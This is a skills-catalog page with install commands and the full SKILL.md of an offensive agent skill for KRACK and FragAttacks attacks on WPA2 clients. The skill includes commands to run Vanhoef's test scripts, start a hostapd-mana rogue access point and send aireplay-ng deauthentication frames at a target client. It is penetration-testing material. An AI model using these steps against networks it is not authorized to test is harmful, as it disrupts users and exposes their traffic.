Deepsec Documentation Guide
vercel-labs/deepsec
Points the agent at deepsec's own docs to answer questions about initializing, configuring, resuming, scanning with and extending the vulnerability scanner.
KRACK (CVE-2017-13077..082) and FragAttacks (CVE-2020-24586..588 + 26139-26147) — key reinstallation, fragmentation, and aggregation attacks against WPA2 supplicants.
$ npx skills add SnailSploit/Claude-Red --skill offensive-krack-fragattacks -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-krack-fragattacks --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .claude/skills && cp -r skills-src/Skills/wireless/offensive-krack-fragattacks .claude/skills/offensive-krack-fragattacks && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "offensive-krack-fragattacks" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-krack-fragattacks into .claude/skills/offensive-krack-fragattacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-krack-fragattacks", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-krack-fragattacksType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add SnailSploit/Claude-Red --skill offensive-krack-fragattacks -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-krack-fragattacks --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .agents/skills && cp -r skills-src/Skills/wireless/offensive-krack-fragattacks .agents/skills/offensive-krack-fragattacks && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "offensive-krack-fragattacks" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-krack-fragattacks into .agents/skills/offensive-krack-fragattacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-krack-fragattacks", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add SnailSploit/Claude-Red --skill offensive-krack-fragattacks -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-krack-fragattacks --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/Skills/wireless/offensive-krack-fragattacks .cursor/skills/offensive-krack-fragattacks && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "offensive-krack-fragattacks" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-krack-fragattacks into .cursor/skills/offensive-krack-fragattacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-krack-fragattacks", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/SnailSploit/Claude-Red.git --path Skills/wireless/offensive-krack-fragattacks--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add SnailSploit/Claude-Red --skill offensive-krack-fragattacks -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-krack-fragattacks --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/Skills/wireless/offensive-krack-fragattacks .gemini/skills/offensive-krack-fragattacks && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "offensive-krack-fragattacks" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-krack-fragattacks into .gemini/skills/offensive-krack-fragattacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-krack-fragattacks", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install SnailSploit/Claude-Red offensive-krack-fragattacksInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add SnailSploit/Claude-Red --skill offensive-krack-fragattacks -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .github/skills && cp -r skills-src/Skills/wireless/offensive-krack-fragattacks .github/skills/offensive-krack-fragattacks && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "offensive-krack-fragattacks" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-krack-fragattacks into .github/skills/offensive-krack-fragattacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-krack-fragattacks", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add SnailSploit/Claude-Red --skill offensive-krack-fragattacks -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install SnailSploit/Claude-Red offensive-krack-fragattacks --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/Skills/wireless/offensive-krack-fragattacks .opencode/skills/offensive-krack-fragattacks && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "offensive-krack-fragattacks" agent skill from https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-krack-fragattacks into .opencode/skills/offensive-krack-fragattacks/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "offensive-krack-fragattacks", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
offensive-krack-fragattacksKRACK (CVE-2017-13077..082) and FragAttacks (CVE-2020-24586..588 + 26139-26147) — key reinstallation, fragmentation, and aggregation attacks against WPA2 supplicants.
Offensive Krack Fragattacks is an agent skill from SnailSploit/Claude-Red. KRACK (CVE-2017-13077..082) and FragAttacks (CVE-2020-24586..588 + 26139-26147) — key reinstallation, fragmentation, and aggregation attacks against WPA2 supplicants. Covers Vanhoef's test scripts, viability against modern patched stacks (mostly mitigated post-2021), residual unpatched embedded devices and IoT vendors, and the practical limitations of these attacks in modern engagements. Use when assessing legacy supplicants, embedded clients, or vendors with poor patch cadence.
Its SKILL.md is about 1.1k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Security, covering Vulnerability scanning. The repository describes itself as: claude-red is a curated library of offensive security skills designed for the Claude skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level… The licence is MIT.
4 steps, taken from the first numbered list in SKILL.md.
Read from SKILL.md and the folder at commit 739512a. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
gitFrom the folder's file list and the shell code blocks in SKILL.md.
Hosts in commands or code, which the agent is likely to contact:
github.comFrom URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Offensive Krack Fragattacks loads about 1.1k tokens when it runs. Until then it costs about 128 tokens; SKILL.md has 398 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check noted patterns worth knowing about, such as sudo or a known installer.
sudo ./krack-test-client.py --interface wlan0sudo ./test-fragattacks.py wlan0 --interface wlan0sudo hostapd-mana /tmp/krack_test_ap.confsudo aireplay-ng --deauth 5 -a <real-BSSID> -c <client-MAC> wlan0monsudo ./krack-test-client.py --interface wlan0Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from SnailSploit/Claude-Red at commit 739512a, republished under its MIT licence (© SnailSploit). 398 words, ~1,131 tokens.
.claude/skills/offensive-krack-fragattacks/SKILL.md (or your agent's skills folder).Two attack families against WPA2 client implementations. Both well-disclosed (KRACK 2017, FragAttacks 2021) and largely patched on modern OSes — but the embedded/IoT long tail keeps them in scope for many engagements.
| Family | Target | Patch Status |
|---|---|---|
| KRACK | WPA2 supplicants in 4-way handshake / GTK / FT / TDLS | Major OSes patched 2017–2018 |
| FragAttacks | Frame fragmentation/aggregation across WPA2/3 | Most stacks patched 2021–2022 |
Probability of success today is high only against:
Modern Win11 / iOS 16+ / Android 13+ / hostapd-2.10 are mitigated.
The 4-way handshake's M3 retransmission causes the supplicant to reinstall the same PTK with reset nonce/replay counters. Frames encrypted under the reused keystream become decryptable.
# Vanhoef's official test scripts
git clone https://github.com/vanhoefm/krackattacks-scripts
cd krackattacks-scripts/krackattack
sudo ./krack-test-client.py --interface wlan0
# Tests the supplicant on a connected clientOutput identifies which CVE variants the client is vulnerable to.
When successful:
Not a PSK recovery — you don't get the wireless password from KRACK.
FragAttacks abuse 802.11 fragmentation and aggregation to inject frames that mix encrypted and plaintext fragments, or to splice attacker-controlled fragments into legitimate frames.
git clone https://github.com/vanhoefm/fragattacks
cd fragattacks
sudo ./test-fragattacks.py wlan0 --interface wlan0
# Suite of ~12 tests covering each variant| CVE | Mechanism |
|---|---|
| CVE-2020-24588 | A-MSDU spoofing — inject crafted A-MSDU subframes |
| CVE-2020-24587 | Mixed-key fragment cache poisoning |
| CVE-2020-24586 | Decoupled fragment cache → reuse |
| CVE-2020-26139 | Forwarding plaintext frames before authentication |
| CVE-2020-26140 | Accepting plaintext frames in protected network |
# Rogue AP that drives the test
sudo hostapd-mana /tmp/krack_test_ap.conf
# Force client to associate (deauth from real AP, or social-engineer)
sudo aireplay-ng --deauth 5 -a <real-BSSID> -c <client-MAC> wlan0mon
# Run test once associated
sudo ./krack-test-client.py --interface wlan0For each vulnerable CVE:
© SnailSploit, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in Skills/wireless/offensive-krack-fragattacks of SnailSploit/Claude-Red.
Open the folder on GitHubat commit 739512a
Offensive Krack Fragattacks next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Offensive Krack Fragattacks this skillSnailSploit/Claude-Red | 7.3k | — | ~1.1k | Automated safety check: Notes | MIT | |
| Deepsec Documentation Guidevercel-labs/deepsec | 8.1k | — | ~956 | Automated safety check: Pass | Apache-2.0 | |
| Shiro Attack CLISummerSec/ShiroAttack2 | 2.6k | — | ~945 | Automated safety check: Pass | MIT | |
| Cve Remediationrundeck/rundeck | 6.3k | — | ~2.9k | Automated safety check: Pass | Apache-2.0 | |
| Native Dependency Updatemono/SkiaSharp | 5.6k | — | ~4.1k | Automated safety check: Pass | MIT | |
| Forensifyalexgreensh/repo-forensics | 187 | — | ~2.5k | Automated safety check: Notes | Custom licence |
vercel-labs/deepsec
Points the agent at deepsec's own docs to answer questions about initializing, configuring, resuming, scanning with and extending the vulnerability scanner.
SummerSec/ShiroAttack2
当用户要求利用、检测或测试 Apache Shiro rememberMe 反序列化漏洞 (Shiro-550, CVE-2016-4437) 时使用。触发词包括 "Shiro"、"rememberMe"、"shiro attack"、"CVE-2016-4437"、"Shiro-550"、"爆破 Shiro key"、"利用 Shiro"、"Shiro…
rundeck/rundeck
Verify if a CVE affects the project and remediate it. An agent skill from rundeck/rundeck.
mono/SkiaSharp
Update native dependencies (libpng, libexpat, zlib, libwebp, harfbuzz, freetype, libjpeg-turbo, etc.) in SkiaSharp's Skia fork.
alexgreensh/repo-forensics
Cross-agent self-inspection of your AI-agent stack. An agent skill from alexgreensh/repo-forensics.
evdenis/cvehound
Write, debug, or validate a CVEhound detection rule (.cocci or .grep) for a Linux kernel CVE.
SnailSploit/Claude-Red
Practical offensive fuzzing methodology covering target identification, fuzzer selection (AFL++, libFuzzer, Honggfuzz, Boofuzz, syzkaller), harness writing, corpus curation, mutation strategies…
SnailSploit/Claude-Red
LoRaWAN and sub-GHz (433 / 868 / 915 MHz) attack methodology — LoRaWAN ABP/OTAA join attack, network/session key reuse, frame counter replay, downlink injection on TTN/Helium-style networks, sub-GHz…
SnailSploit/Claude-Red
Mobile (Android + iOS) application penetration testing methodology.
SnailSploit/Claude-Red
Wireless / 802.11 attack methodology for red team engagements and wireless security assessments.
SnailSploit/Claude-Red
WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout…
SnailSploit/Claude-Red
Z-Wave attack methodology — sniffing with Z-Force / EZ-Wave / RTL-SDR + ZniffMobile, S0 (legacy) network-key derivation flaw and key reuse, S2 (modern) ECDH commissioning analysis, replay/injection…
Categories
KRACK (CVE-2017-13077..082) and FragAttacks (CVE-2020-24586..588 + 26139-26147) — key reinstallation, fragmentation, and aggregation attacks against WPA2 supplicants. Offensive Krack Fragattacks is an agent skill from SnailSploit/Claude-Red.588 + 26139-26147) — key reinstallation, fragmentation, and aggregation attacks against WPA2 supplicants.
Offensive Krack Fragattacks fits situations like: assessing legacy supplicants; embedded clients; vendors with poor patch cadence.
Run `npx skills add SnailSploit/Claude-Red --skill offensive-krack-fragattacks -a claude-code`. Or copy the skill folder (Skills/wireless/offensive-krack-fragattacks in SnailSploit/Claude-Red) into .claude/skills/offensive-krack-fragattacks in your project. Claude Code loads it when a task matches its description.
Run `npx skills add SnailSploit/Claude-Red --skill offensive-krack-fragattacks -a codex`. Or copy the skill folder (Skills/wireless/offensive-krack-fragattacks in SnailSploit/Claude-Red) into .agents/skills/offensive-krack-fragattacks in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add SnailSploit/Claude-Red --skill offensive-krack-fragattacks -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/offensive-krack-fragattacks, .gemini/skills/offensive-krack-fragattacks, .github/skills/offensive-krack-fragattacks and .opencode/skills/offensive-krack-fragattacks in your project.
Going by SKILL.md and its folder, Offensive Krack Fragattacks needs the command-line tools its instructions call (git).
SKILL.md names 1 domain. In commands or code: github.com; the agent is likely to contact it when it follows the instructions. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found notes only (runs commands with sudo), nothing it rates as a warning. It is not a guarantee. Review the folder before installing.
Offensive Krack Fragattacks is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 1.1k tokens (SKILL.md is roughly 4.5k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Offensive Krack Fragattacks: Deepsec Documentation Guide (vercel-labs/deepsec, 8.1k stars), Shiro Attack CLI (SummerSec/ShiroAttack2, 2.6k stars), Cve Remediation (rundeck/rundeck, 6.3k stars) and Native Dependency Update (mono/SkiaSharp, 5.6k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
SnailSploit (a GitHub user) maintains it in SnailSploit/Claude-Red, which has 7,321 GitHub stars. The repository holds 10 skills in this directory. The repository was last updated on September 19, 2026.
Source: SnailSploit/Claude-Red on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.